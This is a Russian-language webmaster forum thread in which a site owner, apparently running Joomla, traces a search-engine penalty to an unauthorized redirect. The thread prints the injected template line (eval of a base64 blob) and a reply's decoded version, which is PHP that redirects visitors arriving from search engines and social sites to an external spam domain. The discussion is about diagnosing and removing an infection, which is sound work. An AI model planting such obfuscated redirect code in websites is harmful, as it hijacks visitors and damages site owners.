Сайт выпал из выдачи Яндекса по причине несанкционированного редиректа.

Сталкивался с такой фигней, проблему нашел .htaccess много инфы в инете по этому поводу. Но сменить .htaccess не вариант, надо дыры в движке латать.

Ребят, кое-что я уже понял, дело в яваскриптах.

А правильно ли я понял, что дело может быть всего в нескольких скриптах, которые упоминаются в index.php ( 7 отдельных файлов с расширением .js)?

И скрипты, которые прописаны в шаблоне:

<script type="text/javascript">
$(document).ready(function(){
 $(".RadioClass").change(function(){
if($(this).is(":checked")){
 $(".RadioSelected:not(:checked)").removeClass("RadioSelected");
 $(this).next("label").addClass("RadioSelected");
 }
 }); 
 });
</script>

и

<script type="text/javascript">
function keepAlive() {	var myAjax = new Request({method: "get", url: "index.php"}).send();} window.addEvent("domready", function(){ keepAlive.periodical(3540000); });
  </script>

Следовательно, мои действия:

1) попробовать затереть прописанные яваскрипты в шаблоне

2) заменить те 7 файлов с расширением .js на, предположительно безопасные (например, из бэкапа).

ПС: Обнаружил в шаблоне такой код, который нигде больше не виден:

?<?php     eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vd3d3LmlzZmFydC5mYXJ0aXQuY29tLyIpOw0KZXhpdCgpOw0KfQp9Cn0NCn0NCn0="));      
/*
 * J!Blank Template for Joomla by Joomla-book.ru
 * @author Joomla-book.ru
 * @email admin@joomla-book.ru
 */

defined('_JEXEC') or die;
require_once(dirname(__FILE__).DS.'php'.DS.'_code.php');

dendyizgetto, Да, это (последнее) оно и есть - вот в расшифровке:

$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://www.isfart.fartit.com/");
exit();
}
}
}
}
}

Шаблон откуда брался?

там зашифрована именно ваша проблема, убирайте.

в шаблоне этого могло и не быть изначально.

верхний пост не заметил =)

В общем, жесть эта строка прописана в каждом фале сайта.

Придется все это вычищать.